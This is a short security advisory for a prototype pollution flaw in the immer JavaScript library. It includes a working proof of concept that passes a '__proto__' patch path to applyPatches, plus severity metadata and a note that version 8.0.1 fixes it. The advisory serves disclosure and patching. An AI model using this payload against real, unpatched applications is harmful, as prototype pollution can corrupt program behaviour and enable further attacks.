Affected versions of immer are vulnerable to Prototype Pollution.
const {applyPatches, enablePatches} = require("immer");
enablePatches();
let obj = {};
console.log("Before : " + obj.polluted);
applyPatches({}, [ { op: 'add', path: [ "__proto__", "polluted" ], value: "yes" } ]);
// applyPatches({}, [ { op: 'replace', path: [ "__proto__", "polluted" ], value: "yes" } ]);
console.log("After : " + obj.polluted);
Version 8.0.1 contains a fix for this vulnerability, updating is recommended.
{ "nvd_published_at": "2021-01-19T11:15:00Z", "cwe_ids": [ "CWE-471" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2021-01-20T19:37:58Z" }